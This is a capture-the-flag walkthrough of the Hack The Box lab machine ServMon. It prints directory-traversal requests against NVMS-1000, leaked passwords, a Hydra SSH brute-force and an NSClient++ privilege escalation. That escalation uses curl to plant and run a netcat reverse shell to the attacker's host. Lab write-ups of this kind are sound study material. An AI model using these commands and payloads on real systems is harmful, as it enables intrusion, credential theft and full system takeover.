Quick Summary
→ Very nice box which is fit for beginners’ a machine that vulnerable to directory traversal
which the attacker can enumerate several files and gain access to this machine. I will say the privilege escalation part is quiet hard if you take the web server of NSClient++
because it’s takes time to load due high network traffic, but I can easily get the root
using cURL
to send request. Using cURL
i send nc.exe
and execute it. Finally got the root
.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Service enumeration
→ ftp
is available so I digging it
→ got the confidential.txt
Post - Exploitation
→ Login to web page with credentials
we got.
→ NVMS-1000
was vulnerable to directory-traversal
→ enumerate machine with directory-traversal
vulnerabilty
→ Found the password.txt
file on a desktop
Exploitation
→ collect the all the password
→ use it bruteforce user using Hydra
→ finally I got the right password and login it into ssh and get user.txt
Privilege Escalation
→ start enumerating directories
→ found the NSClient++
folder
→ after searching it on google
there was vulnerability in NSClient++
where the low privilege can ability to read the web administator’s password in cleartext from the configuration file.
→ due to high load of network traffic in the web page’ it is so slow to load so I try cURL
to get root
→ try to put nc.exe
using SMB Server
→ load the binary and execute
→ Finally we get the root
Network Scanning
Walkthrough
→ I always begin at NMAP to look on the services what is running. I always use
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to —script=default
- -A- ⇒ Agressive scan
- -oN ⇒ to save our scan results to a text file
# bash
nmap -sV -sC -A 10.10.10.184 -oN nmap-ServMon
|
# bash
root in htb/boxes/ServMon ❯ nmap -sV -sC -A 10.10.10.184 -oN nmap-ServMon Starting Nmap 7.80 ( https: Nmap scan report for 10.10.10.184 Host is up (0.25s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM <DIR> Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 Not Found | Content-type: text/html | Content-Length: 0 | Connection: close | AuthInfo: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | <!DOCTYPE html PUBLIC "- | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <title></title> | <script type="text/javascript"> | window.location.href = "Pages/login.htm"; | </script> | </head> | <body> | </body> |_ </html> |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5666/tcp open nrpe? 6699/tcp open napster? 8443/tcp open tcpwrapped | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.80%I=7%D=4/14%Time=5E94FF5F%P=x86_64-pc-linux-gnu%r(GetR SF:equest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe SF:f\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\ SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra SF:nsitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtm SF:l\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<s SF:cript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20w SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20 SF:</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPOption SF:s,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent- SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb SF:\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti SF:onal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\ SF:r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script SF:\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scr SF:ipt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPRequest,1B4 SF:,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-Lengt SF:h:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb\xbf< SF:!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transit SF:ional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\ SF:.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\r\n<h SF:ead>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script\x20t SF:ype=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window\.loc SF:ation\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</script>\ SF:r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(FourOhFourRequest,65 SF:,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r\nCon SF:tent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=4/14%OT=21%CT=1%CU=44262%PV=Y%DS=2%DC=T%G=Y%TM=5E95004 OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=106%TI=I%CI=I%TS=U)SEQ(SP=F OS:C%GCD=1%ISR=FC%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS% OS:O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3 OS:=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N OS:%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S% OS:F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R OS:D=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0% OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPC OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: 2m57s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-04-14T00:16:09 |_ start_date: N/A
TRACEROUTE (using port 993/tcp) HOP RTT ADDRESS 1 257.80 ms 10.10.14.1 2 257.93 ms 10.10.10.184
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 317.59 seconds
root in htb/boxes/ServMon took 5m17s ❯
|
Nmap Results
So there’s a lot of ports open but let’s check which most interesting. Checking that 1 by 1 takes a lot of time
Enumeration
Checking the FTP Service
Since there was an ftp
let’s check it if we can access it anonymously :
root in htb/boxes/ServMon ❯ ftp 10.10.10.184 Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:05PM <DIR> Users 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:06PM <DIR> Nadine 01-18-20 12:08PM <DIR> Nathan 226 Transfer complete. ftp>
|
Inside the ftp
file we got two users – Nadine
& Nathan
let’s check first Nadine’s directory and transfer it to my Kali machine.
ftp> cd Nadine 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:08PM 174 Confidential.txt 226 Transfer complete. ftp> get Confidential.txt local: Confidential.txt remote: Confidential.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 174 bytes received in 6.29 secs (0.0270 kB/s) ftp>
|
so inside of nadine
directory there a confidential.txt
file’ next, check Nathan directory :
ftp> cd .. 250 CWD command successful. ftp> cd Nathan 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:10PM 186 Notes to do.txt 226 Transfer complete. ftp> get "Notes to do.txt" local: Notes to do.txt remote: Notes to do.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 186 bytes received in 0.25 secs (0.7285 kB/s) ftp>
|
There is Notes to do.txt
so it is task for our user.
Next’ read the .txt
file of two users
root in htb/boxes/ServMon ❯ ls Confidential.txt nmap-ServMon 'Notes to do.txt'
root in htb/boxes/ServMon ❯ cat Confidential.txt Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine root in htb/boxes/ServMon ❯
|
so I get a hint from nadine
txt file. It seems that the admin
put her password in her desktop.
Next the task of nathan
:
root in htb/boxes/ServMon ❯ cat 'Notes to do.txt' 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint root in htb/boxes/ServMon ❯
|
So another hint I got. the 1 & 2 task are completed but the remaining 3 are not.
Let’s start digging more :
Post Exploitation
Checking the Web client
I visit on the web page of the box. In nathan
notes they mentioned the NVMS
, and this seems has version – NVMS - 1000
.
I search it on google and it is vulnerable to directory - traversal
:
The step by step on Exploit DB
OffSec’s Exploit Database Archive
NVMS 1000 - Directory Traversal.. webapps exploit for Hardware platform
The NVMS
login page :
Directory Traversal
In this phase i will try nvms-1000
exploit’ with Burp Suite
:
Directory traversal confirmed ! Now’ let’s try to look at nadine
desktop it’s mentioned on here note that her password is there :
GET /../../../../../../../../../../../../Users/Nadine/Desktop/Passwords.txt HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: dataPort=6063 Upgrade-Insecure-Requests: 1
|
but I got 404
status :
HTTP/1.1 404 Not Found Content-type: text/html Content-Length: 0 Connection: close AuthInfo:
|
I think password of nadine
doesn’t exist so I tried user nathan
if i can get any :
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: dataPort=6063 Upgrade-Insecure-Requests: 1
|
after I send that request I got a list of passwords :
HTTP/1.1 200 OK Content-type: text/plain Content-Length: 156 Connection: close AuthInfo:
1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$
|
Exploitation
Brute forcing the SSH
I saved all the passwords
in a txt file then I create another txt file which contains 2 users – nadine
& nathan
I use hydra
to brute force the SSH
service and finally I got the right credentials .
root in htb/boxes/ServMon took 1m15s ❯ hydra -L users -P passwords 10.10.10.184 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-14 08:45:38 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task [DATA] attacking ssh://10.10.10.184:22/ [22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-14 08:45:58
root in htb/boxes/ServMon took 24s ❯
|
Get user.txt
after I found the right creds. I finally get in to the machine and grab the user.txt
# bash
root in htb/boxes/ServMon ❯ ssh nadine@10.10.10.184 nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine
08/04/2020 23:16 <DIR> . 08/04/2020 23:16 <DIR> .. 18/01/2020 11:23 <DIR> 3D Objects 18/01/2020 11:23 <DIR> Contacts 08/04/2020 22:28 <DIR> Desktop 08/04/2020 22:28 <DIR> Documents 18/01/2020 11:23 <DIR> Downloads 08/04/2020 22:27 <DIR> Favorites 08/04/2020 22:27 <DIR> Links 18/01/2020 11:23 <DIR> Music 18/01/2020 11:31 <DIR> OneDrive 18/01/2020 11:23 <DIR> Pictures 18/01/2020 11:23 <DIR> Saved Games 18/01/2020 11:23 <DIR> Searches 18/01/2020 11:23 <DIR> Videos 0 File(s) 0 bytes 15 Dir(s) 27,382,452,224 bytes free
nadine@SERVMON C:\Users\Nadine>cd Desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine\Desktop
08/04/2020 22:28 <DIR> . 08/04/2020 22:28 <DIR> .. 14/04/2020 01:20 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 27,382,452,224 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>more user.txt [-----]bb8f5da6[-------------------]
nadine@SERVMON C:\Users\Nadine\Desktop>
|
Privilege Escalation
Enumerating directories
at first I started to enumerate the machine directories and I found inside on ‘Program Files’ directories what’s mentioned in nathan's
note which is the NSClient++
# bash
nadine@SERVMON C:\Users\Nadine\Desktop>cd /
nadine@SERVMON C:\>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C
Directory of C:\
08/04/2020 23:21 <DIR> inetpub 19/03/2019 05:52 <DIR> PerfLogs 08/04/2020 23:21 <DIR> Program Files 08/04/2020 23:21 <DIR> Program Files (x86) 18/01/2020 11:00 <DIR> RecData 18/01/2020 12:31 <DIR> Shared 14/04/2020 01:38 <DIR> Temp 08/04/2020 22:26 <DIR> Users 09/04/2020 09:38 <DIR> Windows 0 File(s) 0 bytes 9 Dir(s) 27,379,249,152 bytes free
nadine@SERVMON C:\>cd 'Program Files' The system cannot find the path specified.
nadine@SERVMON C:\>cd "Program Files"
nadine@SERVMON C:\Program Files>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C
Directory of C:\Program Files
08/04/2020 23:21 <DIR> . 08/04/2020 23:21 <DIR> .. 08/04/2020 23:21 <DIR> Common Files 08/04/2020 23:18 <DIR> Internet Explorer 19/03/2019 05:52 <DIR> ModifiableWindowsApps 16/01/2020 19:11 <DIR> NSClient++ 08/04/2020 23:09 <DIR> Reference Assemblies 08/04/2020 23:21 <DIR> UNP 14/01/2020 09:14 <DIR> VMware 08/04/2020 22:31 <DIR> Windows Defender 08/04/2020 22:45 <DIR> Windows Defender Advanced Threat Protection 19/03/2019 05:52 <DIR> Windows Mail 19/03/2019 12:43 <DIR> Windows Multimedia Platform 19/03/2019 06:02 <DIR> Windows NT 19/03/2019 12:43 <DIR> Windows Photo Viewer 19/03/2019 12:43 <DIR> Windows Portable Devices 19/03/2019 05:52 <DIR> Windows Security 19/03/2019 05:52 <DIR> WindowsPowerShell 0 File(s) 0 bytes 18 Dir(s) 27,379,228,672 bytes free
nadine@SERVMON C:\Program Files>
|
I search this on google and I found this step by step privilege escalation.
Base on the exploit, When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator’s password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.
Grab administrator password
I open the NSClient++
directories and try to display the admin password :
# bash
Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>cd \"Program Files"
nadine@SERVMON C:\Program Files>cd NSClient++
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display Current password: ew2x6SsGTxjRwXOT
nadine@SERVMON C:\Program Files\NSClient++>
|
Got it ! Now let’s check on what port is running NSClient++
Web Server
# bash
nadine@SERVMON C:\Program Files>netstat -ano
Active Connections
Proto Local Address Foreign Address State PID TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 2472 TCP 0.0.0.0:22 0.0.0.0:0 LISTENING 2696 TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 8064 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 884 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 3924 TCP 0.0.0.0:5666 0.0.0.0:0 LISTENING 1832 TCP 0.0.0.0:5666 0.0.0.0:0 LISTENING 1832 TCP 0.0.0.0:6063 0.0.0.0:0 LISTENING 8064 TCP 0.0.0.0:6699 0.0.0.0:0 LISTENING 8064 TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 7344 TCP 0.0.0.0:8443 0.0.0.0:0 LISTENING 1832
|
The NSClient++
is running on port 8443
it is also appear on my nmap scan on recon phase.
8443/tcp open tcpwrapped | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time
|
To work on this I need to use port forwarding
and visit the NSClient web page.
root in htb/boxes/ServMon ❯ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>
|
NSClient++ Web Server
I found some difficulty to access the web server it is so slow to respond and load due to high network traffic but I can use cURL
to send a request.
Steps to get reverse shell :
I will try to transfer my nc.exe
using SMB Server
and try to put nc.exe
inside so :
root in htb/boxes/ServMon ❯ curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/payas0.bat --data-binary "C:\Temp\nc.exe 10.10.15.151 9001 -e cmd.exe" Enter host password for user 'admin':
Added payas0 as scripts\payas0.bat
root in htb/boxes/ServMon took 12s ❯
|
I got the message that my script is added. Next i will setup my netcat
and execute the binary using this request .
root in htb/boxes/ServMon ❯ curl -s -k -u admin https://localhost:8443/api/v1/queries/payas0/commands/execute?time=1m Enter host password for user 'admin':
|
after 1 minute I successfully got admin shell :
# bash root in htb/boxes/ServMon ❯ nc -nvlp 9001 listening on [any] 9001 ... connect to [10.10.15.151] from (UNKNOWN) [10.10.10.184] 52839 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https:
PS C:\Program Files\NSClient++>
|
Finally I’ve got the root
# bash
PS C:\Program Files\NSClient++> whoami whoami nt authority\system PS C:\Program Files\NSClient++>
|
Grab root flag
After getting the admin I can grab now the root.txt
# bash
PS C:\users\Administrator\Desktop> cat root.txt cat root.txt 64e1-------------------------f274 PS C:\users\Administrator\Desktop>
|
If you liked my writeup please leave a respect on my Profile
Referrences:
NVMS-1000 Exploit
NSClient++ - Privilege Escalation